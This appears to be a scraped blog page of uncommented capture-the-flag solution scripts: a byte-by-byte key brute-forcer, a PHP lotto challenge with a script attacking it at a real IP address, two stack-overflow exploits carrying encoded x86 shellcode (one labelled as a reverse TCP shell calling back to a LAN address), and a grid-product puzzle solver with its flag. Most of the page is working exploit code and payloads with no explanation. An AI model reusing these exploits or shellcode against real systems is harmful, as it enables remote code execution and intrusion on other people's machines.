xeros RSS FEED

#!/usr/bin/python

from pwn import *

from socket import *

string = ""

s = socket(AF_INET, SOCK_STREAM)

s.connect(("localhost", 31335))

print recvUntil(s, "$")

for i in range(32):

for j in range(0x80, 0x20, -1):

tmp = chr(j)

s.send("enable\n")

print s.recv(1024)

payload = ""

payload += string+tmp

payload += "\x20"*(26-(i+1))

s.send(payload+"\n")

if chr(0xff) not in s.recv(1024):

string += chr(j)

break

print "Key is : "+string

<?php

function generate_secret()

{   

    return sha1("123").sha1("123");

}

session_start();

if(!isset($_SESSION['secret']))

    $_SESSION['secret'] = generate_secret();

if(!isset($_POST['guess']))

{

    echo 'Wanna play lotto? Just try to guess 320 bits.<br/><br/>'.PHP_EOL;

    highlight_file(__FILE__);

    exit;

}

$guess = $_POST['guess'];

if($guess === $_SESSION['secret'])

{

    $flag = require('flag.php');

    exit('Lucky bastard! You won the flag! ' . $flag);

}

//else...

echo "Wrong! '{$_SESSION['secret']}' != '";

echo htmlspecialchars($guess);

echo "'";

$_SESSION['secret'] = generate_secret();

#!/usr/bin/python

import thread

import httplib, urllib

guess = ""

def thread1():

    global guess

    headers = {"Content-type": "application/x-www-form-urlencoded",

               "Cookie": "PHPSESSID=123cookie"

               }

    conn = httplib.HTTPConnection("134.213.136.172", 80)

    conn.request("POST", "", "guess="+"A"*100000, headers)

    guess = conn.getresponse().read(92)[8:88]

def thread2():

    global guess

    headers = {"Content-type": "application/x-www-form-urlencoded",

               "Cookie": "PHPSESSID=123cookie"

               }

    while guess=="":

        pass

    conn = httplib.HTTPConnection("134.213.136.172", 80)

    conn.request("POST", "", "guess="+guess, headers)

    response = conn.getresponse()

    data = response.read()

    print data

    conn.close()

thread.start_new_thread(thread2, ())

thread.start_new_thread(thread1, ())

#!/usr/bin/python

from socket import *

from struct import pack

from time import sleep

p = lambda x : pack("<L", x)

jmpesp = p(0x80488b0)

#linux/x86/shell_reverse_tcp LHOST : 192.168.161.129 LPORT : 4321

shellcode = ""

shellcode += "\xba\xe8\xd3\x61\xde\xda\xc6\xd9\x74\x24\xf4\x5f\x33\xc9"

shellcode += "\xb1\x12\x31\x57\x12\x83\xc7\x04\x03\xbf\xdd\x83\x2b\x0e"

shellcode += "\x39\xb4\x37\x23\xfe\x68\xd2\xc1\x89\x6e\x92\xa3\x44\xf0"

shellcode += "\x40\x72\xe7\xce\xab\x04\x4e\x48\xcd\x6c\x91\x02\x8c\xed"

shellcode += "\x79\x51\xcf\xfd\x98\xdc\x2e\x4d\x3c\x8f\xe1\xfe\x72\x2c"

shellcode += "\x8b\xe1\xb8\xb3\xd9\x89\x6d\x9b\xae\x21\x1a\xcc\x32\xd8"

shellcode += "\xb4\x9b\x50\x48\x1a\x15\x77\xdc\x97\xe8\xf8"

payload ="echo "

payload +="\x41"*0x76 

payload +=jmpesp

payload +="\x90"*50

payload +=shellcode

s = socket(AF_INET, SOCK_STREAM)

s.connect(("localhost", 9000))

print s.recv(1024)

s.send(payload)

s.close()

n * n 의 (10 <= n <= 30) 격자와, 자연수 x 가 주어집니다

n * n 격자 안에서 x 개의 인접한 수들의 곱의 최대값을 구하시오(수평, 수직, 대각선, 역대각선 모두 포함)

정답 제출 방식 : 

수평으로 곱이 최대값이라면, hori_곱의결과

수직으로의 곱이 최대값이라면, verti_곱의결과

대각선으로의 곱이 최대값이라면 diago_곱의결과

역대각선으로의 곱이 최대값이라면 condiago_곱의결과

정답을 위와 같은 방식으로 제출 해 주십시오

Stage (0 / 20)

65 25 56 10 16 05 08 28 91 41 11 69 06 54 16 16 90 55 69 20 47 86 87 51 92 45 30 92 25

36 90 25 28 79 98 05 56 85 10 34 25 18 27 78 94 43 26 72 65 69 98 54 50 83 70 75 83 66

72 53 96 30 82 75 11 55 67 82 10 22 45 38 50 73 37 20 02 52 46 60 15 63 46 44 69 96 48

68 67 55 15 71 49 73 25 72 91 21 39 23 09 90 64 45 91 31 07 96 71 62 79 42 31 57 88 45

56 19 17 97 04 12 94 55 23 19 95 30 28 37 68 28 78 85 41 90 27 71 60 35 03 24 30 06 95

73 55 98 74 95 44 08 70 13 39 78 88 34 80 69 80 45 47 02 23 65 11 50 26 13 50 58 50 40

84 42 59 22 46 45 64 95 51 19 91 84 62 12 79 37 83 69 32 87 56 45 10 56 20 53 88 54 57

01 85 83 14 98 95 38 84 43 39 68 34 55 69 71 25 14 92 94 41 73 89 58 23 57 15 78 37 29

46 48 68 55 41 97 17 26 13 02 54 23 13 97 56 36 95 84 32 97 14 45 60 80 08 91 09 23 76

22 63 02 97 04 06 95 85 81 39 90 66 62 21 59 65 28 14 65 26 70 94 74 50 90 90 70 25 01

51 88 63 94 39 11 27 68 54 09 87 17 50 12 86 51 29 99 88 65 63 48 53 06 41 29 87 48 17

74 46 25 72 48 51 49 85 09 74 36 16 11 78 72 02 66 39 82 59 10 27 81 31 37 25 91 93 02

51 33 96 12 79 55 46 12 45 22 60 54 24 24 10 36 65 78 85 17 67 72 52 63 95 01 35 79 60

77 53 32 04 48 86 05 61 18 04 64 30 50 48 54 54 88 70 86 38 65 83 86 65 11 78 09 07 17

07 52 97 08 62 87 11 99 73 43 03 91 41 83 40 13 66 27 61 67 49 74 10 17 66 38 97 54 12

15 95 95 73 14 62 73 63 27 05 02 22 33 48 92 71 93 64 18 23 57 49 33 44 46 80 39 13 28

84 43 30 26 42 73 20 71 29 91 02 75 31 37 59 02 71 11 19 14 66 52 70 50 26 64 36 42 01

02 23 89 72 43 13 87 49 31 81 10 38 76 60 45 33 83 88 65 75 36 49 74 15 66 14 15 18 95

66 46 37 97 46 79 64 78 67 74 37 16 47 12 77 96 27 72 42 78 37 90 88 83 69 60 32 32 67

78 04 56 63 97 90 07 98 98 43 88 02 17 10 30 33 25 36 77 41 57 91 08 68 46 95 79 46 23

09 56 40 15 04 39 08 86 70 87 16 19 73 24 32 83 77 73 62 87 39 51 58 23 77 35 30 79 01

27 68 52 65 42 42 43 48 39 35 15 55 92 42 46 92 08 06 59 70 26 20 69 51 08 35 29 61 99

73 14 30 70 74 77 52 59 73 26 77 93 05 83 37 70 94 17 75 21 42 87 51 54 71 64 62 89 23

89 01 03 31 99 88 67 93 18 96 93 20 25 30 40 17 26 54 49 59 25 09 17 41 45 59 98 97 97

84 81 06 32 56 52 59 29 55 38 95 68 04 49 28 99 24 94 29 38 89 52 85 19 04 61 46 12 65

40 32 53 04 30 70 87 46 33 64 67 52 12 52 10 42 66 47 39 25 09 71 67 47 74 75 64 41 63

91 72 68 92 20 69 72 59 33 50 33 19 72 71 35 09 35 17 75 41 67 30 02 65 39 93 51 59 93

93 12 56 76 39 47 66 77 41 78 42 09 02 70 71 18 18 42 66 53 01 70 44 13 62 39 47 81 73

51 60 94 54 09 62 14 40 88 54 09 26 82 73 36 68 13 41 22 33 40 69 19 53 91 78 66 08 16

x = 6

answer> 

from socket import *

s = socket(AF_INET, SOCK_STREAM)

s.connect(('prob2.christmasctf.com', 4725))

print s.recv(2048)

a = ""

a=s.recv(4096)

a+=s.recv(4096)

while True:

    print a

    L = ""

    x = int(a.split('\n')[-3].split()[2])

    print x

    L = a.split('\n')[2:-5]

    leng = len(L[0].split())

    M = [i.split() for i in L]

    M = [[int(j) for j in i] for i in M]

    # there are 20 rows, each containing 20 integers

    max_prod = 0

    tmp = ""

    for i in range(leng):

        for j in range(pow(x, 2)):

            # right/left products

            try:

                if x == 4:

                    prod = M[i][j]*M[i][j+1]*M[i][j+2]*M[i][j+3]

                elif x == 5:

                    prod = M[i][j]*M[i][j+1]*M[i][j+2]*M[i][j+3]*M[i][j+4]

                else:

                    prod = M[i][j]*M[i][j+1]*M[i][j+2]*M[i][j+3]*M[i][j+4]*M[i][j+5]

            except:

                pass

            if prod > max_prod: 

                max_prod = prod

                tmp = "hori_"

            # up/down products

            try:

                if x == 4:

                    prod = M[j][i]*M[j+1][i]*M[j+2][i]*M[j+3][i]

                elif x == 5:

                    prod = M[j][i]*M[j+1][i]*M[j+2][i]*M[j+3][i]*M[j+4][i]

                else:

                    prod = M[j][i]*M[j+1][i]*M[j+2][i]*M[j+3][i]*M[j+4][i]*M[j+5][i]

            except:

                pass

            if prod > max_prod:

                max_prod = prod

                tmp = "verti_"

    # diagonal products

    for i in range(pow(x, 2)):

        for j in range(pow(x, 2)):

            try:

                if x == 4:

                    prod = M[i][j]*M[i+1][j+1]*M[i+2][j+2]*M[i+3][j+3]

                elif x == 5:

                    prod = M[i][j]*M[i+1][j+1]*M[i+2][j+2]*M[i+3][j+3]*M[i+4][j+4]

                else:

                    prod = M[i][j]*M[i+1][j+1]*M[i+2][j+2]*M[i+3][j+3]*M[i+4][j+4]*M[i+5][j+5]

            except:

                pass

            if prod > max_prod: 

                max_prod = prod

                tmp = "diago_"

    for i in range(3,leng):

        for j in range(16):

            try:

                if x == 4:

                    prod = M[i][j]*M[i-1][j+1]*M[i-2][j+2]*M[i-3][j+3]

                elif x == 5:

                    prod = M[i][j]*M[i-1][j+1]*M[i-2][j+2]*M[i-3][j+3]*M[i-4][j+4]

                else:

                    prod = M[i][j]*M[i-1][j+1]*M[i-2][j+2]*M[i-3][j+3]*M[i-4][j+4]*M[i-5][j+5]

            except:

                pass

            if prod > max_prod:

                max_prod = prod

                tmp = "condiago_"

    key = ""

    key = tmp+str(max_prod)

    s.send(key+"\n")

    print key

    a = ""

    a = s.recv(4096)

크리스마스의 행복도 곱하기가 되길 바라며…

Flag is I_L0VE_S6nta, I_L0Ve_Father, I_L0VE_Y0U… 

#!/usr/bin/python

from socket import *

from struct import pack

from time import sleep

p = lambda x : pack("<L", x)

recv_plt = p(0x08048780)

bss = p(0x0804b0a0)

shellcode = "\xdb\xd6\xbb\xed\x91\xd8\x8f\xd9\x74\x24\xf4\x5e\x33\xc9"

shellcode += "\xb1\x12\x31\x5e\x1a\x03\x5e\x1a\x83\xee\xfc\xe2\x18\xa0"

shellcode += "\x03\x78\x01\x90\xf0\xd4\xaf\x15\x7e\x3b\x9f\x7c\x4d\x3c"

shellcode += "\x84\xde\x25\x42\x3a\xdf\xb4\xda\x52\xc1\xd7\x44\xf1\x97"

shellcode += "\x07\xd8\xa5\xee\xc9\x99\x2f\x97\x51\xd3\x2f\x0e\xe5\x32"

shellcode += "\x9f\x8e\x24\x44\x96\x89\x4f\x15\x40\x45\x9f\xe5\xf8\xf1"

shellcode += "\xf0\x6b\x91\x6f\x86\x8f\x31\x23\x11\xae\x01\xc8\xec\xb1"

payload = ""

payload += "write"

payload += "\x41"*0xf0

payload += recv_plt

payload += bss

payload += p(4)

payload += bss

payload += p(len(shellcode))

payload += p(0)

s = socket(AF_INET, SOCK_STREAM)

s.connect(('localhost', 7777))

s.recv(1024)

s.send(payload+"\n")

sleep(1)

s.send(shellcode)

s.recv(1024)

s.close()